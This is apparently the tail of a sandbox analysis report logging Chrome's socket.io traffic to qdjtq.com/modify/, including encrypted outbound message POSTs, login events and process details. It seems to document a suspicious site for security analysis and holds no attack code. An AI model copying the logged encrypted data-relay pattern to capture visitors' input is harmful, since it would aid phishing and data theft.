            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            139192.168.2.649863129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:08 UTC665OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muehQ&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 1279
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:08 UTC1279OUTData Raw: 34 32 37 5b 22 6d 65 73 73 61 67 65 22 2c 7b 22 6d 73 67 22 3a 7b 22 74 79 70 65 22 3a 22 55 32 46 73 64 47 56 6b 58 31 38 57 6d 76 52 45 59 6d 6d 5a 4b 72 64 38 5a 36 42 63 75 74 79 48 6e 6c 55 4c 22 2c 22 64 61 74 61 22 3a 22 55 32 46 73 64 47 56 6b 58 31 39 33 42 5a 41 4a 47 6f 53 70 41 2f 49 64 76 5a 37 39 74 56 33 63 35 54 47 31 30 75 75 53 44 48 2b 6d 32 44 67 2b 4f 30 56 71 2b 50 6e 4a 73 32 5a 6c 77 6f 48 4c 33 57 61 42 53 34 71 2b 56 37 37 61 42 4a 56 72 30 42 74 66 6e 46 47 54 6d 49 4c 43 68 68 34 2f 32 43 4c 71 76 52 42 73 6a 7a 74 70 59 73 53 49 35 74 49 49 4b 30 2b 6c 79 4e 42 71 43 55 51 49 6f 68 38 55 73 6d 59 67 75 76 52 43 4b 62 64 52 77 53 35 71 4f 59 71 4a 6b 38 39 77 6d 34 32 45 6f 68 45 79 35 73 67 33 36 6c 77 33 62 74 6d 4b 73 74 32
            Data Ascii: 427["message",{"msg":{"type":"U2FsdGVkX18WmvREYmmZKrd8Z6BcutyHnlUL","data":"U2FsdGVkX193BZAJGoSpA/IdvZ79tV3c5TG10uuSDH+m2Dg+O0Vq+PnJs2ZlwoHL3WaBS4q+V77aBJVr0BtfnFGTmILChh4/2CLqvRBsjztpYsSI5tIIK0+lyNBqCUQIoh8UsmYguvRCKbdRwS5qOYqJk89wm42EohEy5sg36lw3btmKst2
            2024-09-27 00:30:08 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:08 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:08 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            140192.168.2.649865129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:08 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muej9&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 1
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:08 UTC1OUTData Raw: 31
            Data Ascii: 1
            2024-09-27 00:30:08 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:08 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:08 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            141192.168.2.649866129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:09 UTC550OUTGET /socket.io/?EIO=4&transport=polling&t=P8muf1I HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:09 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:09 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:09 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 4e 34 78 42 5f 41 32 4b 52 55 37 38 30 78 53 64 41 48 74 34 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"N4xB_A2KRU780xSdAHt4","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            142192.168.2.649870129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:11 UTC377OUTGET /socket.io/?EIO=4&transport=polling&t=P8muf1I HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:12 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:12 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:12 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 44 6f 37 37 66 32 4d 5a 4c 77 46 6c 30 4e 72 4b 41 48 74 35 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"Do77f2MZLwFl0NrKAHt5","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            143192.168.2.649869129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:11 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mufNn&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 2
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:11 UTC2OUTData Raw: 34 30
            Data Ascii: 40
            2024-09-27 00:30:12 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:12 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:12 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            144192.168.2.649871129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:11 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:12 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:12 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 32
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:12 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 69 4e 57 45 6d 4e 4e 41 36 62 45 70 61 71 5f 52 41 48 74 36 22 7d
            Data Ascii: 40{"sid":"iNWEmNNA6bEpaq_RAHt6"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            145192.168.2.649872129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:11 UTC543OUTGET /socket.io/?EIO=4&transport=websocket&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: Upgrade
            Pragma: no-cache
            Cache-Control: no-cache
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Upgrade: websocket
            Origin: https://qdjtq.com
            Sec-WebSocket-Version: 13
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Sec-WebSocket-Key: LfiH031jsgGta4+UjNWqBg==
            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            2024-09-27 00:30:12 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:12 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:12 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 22{"code":3,"message":"Bad request"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            146192.168.2.649881129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:13 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mug2M&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:14 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:13 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 63
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:14 UTC63INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 38 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 74 72 75 65 5d
            Data Ascii: 42["online-count-user",8,"user-user-VCWLaoDbYs5J0K0KAHtt",true]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            147192.168.2.649882129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:13 UTC663OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mug2V&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 54
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:13 UTC54OUTData Raw: 34 32 39 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 5b 22 75 73 65 72 22 5d 5d
            Data Ascii: 429["login","user-user-VCWLaoDbYs5J0K0KAHtt",["user"]]
            2024-09-27 00:30:14 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:13 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:14 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            148192.168.2.649883129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:13 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:14 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:13 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 98
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:14 UTC98INData Raw: 34 33 39 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 46 72 69 20 53 65 70 20 32 37 20 32 30 32 34 20 30 30 3a 33 30 3a 31 32 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
            Data Ascii: 439[{"code":0,"msg":"ok","time":"Fri Sep 27 2024 00:30:12 GMT+0000 (Coordinated Universal Time)"}]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            149192.168.2.649884129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:13 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mufNn&sid=N4xB_A2KRU780xSdAHt4 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:15 UTC214INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:15 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 1
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:15 UTC1INData Raw: 31
            Data Ascii: 1


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:0
            Start time:20:29:21
            Start date:26/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:20:29:24
            Start date:26/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2000,i,5091690585223991164,14165352931940017661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:20:29:26
            Start date:26/09/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qdjtq.com/modify/"
            Imagebase:0x7ff684c40000
            File size:3'242'272 bytes
            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly